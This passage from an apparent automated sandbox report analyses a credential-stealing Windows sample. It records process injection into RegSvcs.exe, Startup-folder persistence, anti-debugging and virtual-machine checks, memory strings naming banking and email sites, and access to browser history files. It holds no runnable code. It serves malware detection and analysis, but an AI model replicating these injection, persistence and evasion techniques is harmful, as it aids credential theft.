                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 595078Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594968Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594859Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594750Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 594640Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Jump to behavior
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696428655
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                  Source: RegSvcs.exe, 00000003.00000002.4561527420.00000000008F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll!
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                  Source: name.exe, 00000006.00000002.2355877135.0000000000BA8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: War&Prod_VMware_SATA_CD00#
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
                  Source: name.exe, 00000006.00000002.2355877135.0000000000BA8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696428655t
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office365.comVMware20,11696428655t
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696428655f
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696428655
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: outlook.office.comVMware20,11696428655s
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696428655o
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696428655j
                  Source: RegSvcs.exe, 00000007.00000002.4560615551.0000000000DDE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllp
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AMC password management pageVMware20,11696428655
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: interactivebrokers.comVMware20,11696428655
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000003E15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                  Source: RegSvcs.exe, 00000007.00000002.4565975328.0000000004134000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: bankofamerica.comVMware20,11696428655x
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe API call chain: ExitProcess graph end node
                  Source: C:\Users\user\AppData\Local\directory\name.exe API call chain: ExitProcess graph end node
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 3_2_06169548 LdrInitializeThunk, 3_2_06169548
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe Code function: 0_2_0045A370 BlockInput, 0_2_0045A370
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW, 0_2_0040D590
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress, 0_2_0040EBD0
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe Code function: 0_2_03EC42E0 mov eax, dword ptr fs:[00000030h] 0_2_03EC42E0
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe Code function: 0_2_03EC5960 mov eax, dword ptr fs:[00000030h] 0_2_03EC5960
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe Code function: 0_2_03EC5900 mov eax, dword ptr fs:[00000030h] 0_2_03EC5900
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 2_2_03F498D8 mov eax, dword ptr fs:[00000030h] 2_2_03F498D8
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 2_2_03F49938 mov eax, dword ptr fs:[00000030h] 2_2_03F49938
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 2_2_03F482B8 mov eax, dword ptr fs:[00000030h] 2_2_03F482B8
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_03F5A1A0 mov eax, dword ptr fs:[00000030h] 6_2_03F5A1A0
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_03F5A140 mov eax, dword ptr fs:[00000030h] 6_2_03F5A140
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_03F58B20 mov eax, dword ptr fs:[00000030h] 6_2_03F58B20
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe Code function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock, 0_2_004238DA
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe Code function: 0_2_0041F250 SetUnhandledExceptionFilter, 0_2_0041F250
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe Code function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_0041A208
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe Code function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00417DAA
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_0041F250 SetUnhandledExceptionFilter, 6_2_0041F250
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 6_2_0041A208
                  Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 6_2_00417DAA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
                  Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
                  Source: C:\Users\user\AppData\Local\directory\name.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 54D008
                  Source: C:\Users\user\AppData\Local\directory\name.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: AD3008
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe Code function: 0_2_00436CD7 LogonUserW, 0_2_00436CD7
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW, 0_2_0040D590
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00434418
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe Code function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event, 0_2_0043333C
                  Source: C:\Users\user\AppData\Local\directory\name.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe"
                  Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"
                  Source: C:\Users\user\AppData\Local\directory\name.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe"
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exe Code function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_00446124
                  Source: z84TTREMITTANCEUSD347_432_63.exe, name.exe Binary or memory string: Shell_TrayWnd
                  Source: z84TTREMITTANCEUSD347_432_63.exe, name.exe.0.dr Binary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,0_2_004720DB
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_00472C3F GetUserNameW,0_2_00472C3F
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,SetOaNoCache,0_2_0041E364
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeCode function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_0040E500
                  Source: C:\Users\user\Desktop\z84TTREMITTANCEUSD347_432_63.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  Source: Yara match | File source: 00000003.00000002.4562656465.00000000025C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000007.00000002.4562785704.0000000002D81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 6.2.name.exe.43c0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 2.2.name.exe.3b00000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 2.2.name.exe.3b00000.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.name.exe.43c0000.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: name.exe PID: 3228, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 6004, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: name.exe PID: 5744, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 6488, type: MEMORYSTR
                  Source: Yara match | File source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.name.exe.43c0000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 2.2.name.exe.3b00000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 2.2.name.exe.3b00000.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 6.2.name.exe.43c0000.1.unpack, type: UNPACKEDPE
                  Source: Yara match | File source: 00000002.00000002.2171766465.0000000003B00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000002.4560135222.0000000000395000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000007.00000002.4562785704.0000000002E89000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000006.00000002.2357473580.00000000043C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000007.00000002.4560074410.0000000000434000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: 00000003.00000002.4562656465.00000000026FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match | File source: Process Memory Space: name.exe PID: 3228, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: name.exe PID: 5744, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: RegSvcs.exe PID: 6488, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
